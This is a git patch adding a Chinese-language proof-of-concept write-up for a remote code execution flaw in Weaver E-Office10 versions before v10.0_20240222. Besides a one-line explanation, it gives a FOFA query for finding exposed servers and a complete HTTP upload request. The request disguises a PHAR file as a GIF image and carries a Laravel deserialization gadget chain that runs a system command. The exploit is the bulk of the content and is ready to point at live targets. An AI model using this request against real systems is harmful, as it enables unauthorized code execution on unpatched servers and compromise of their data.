From 47b29bab27aa2fbe8a207df7a2d6779e154cbfeb Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 29 Mar 2024 10:22:46 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?=
 =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?=
 =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��本小于v10.0_20240222存在远程代码执行漏洞.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md

diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
new file mode 100644
index 0000000..a762edb
--- /dev/null
+++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
@@ -0,0 +1,35 @@
+## 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞
+
+漏洞的关键在于系统处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器，利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
+
+## 影响版本
+```
+v10.0_20180516 < E-Office10 < v10.0_20240222
+```
+
+
+## fofa
+```
+app="泛微-EOffice"
+```
+
+
+## poc
+```
+POST /eoffice10/server/public/api/attachment/atuh-file HTTP/1.1
+Host: 
+User-Agent: Go-http-client/1.1
+Content-Length: 523
+Accept: string("*/*")
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=ifedjiqy
+
+--ifedjiqy
+Content-Disposition: form-data; name="Filedata"; filename="register.inc"
+Content-Type: image/jpeg
+
+GIF89a<?php __HALT_COMPILER(); ?>
+D.....................O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:".*.events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:".*.queueResolver";s:6:"system";}s:8:".*.event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";s:37:"echo 9yM86ESyFBXNDwCh6Nbsxy9wrcQrP25P";}}....test.txt....K..f.....~..........test.).i..f3....2pq....>....GBMB
+--ifedjiqy--
+```
+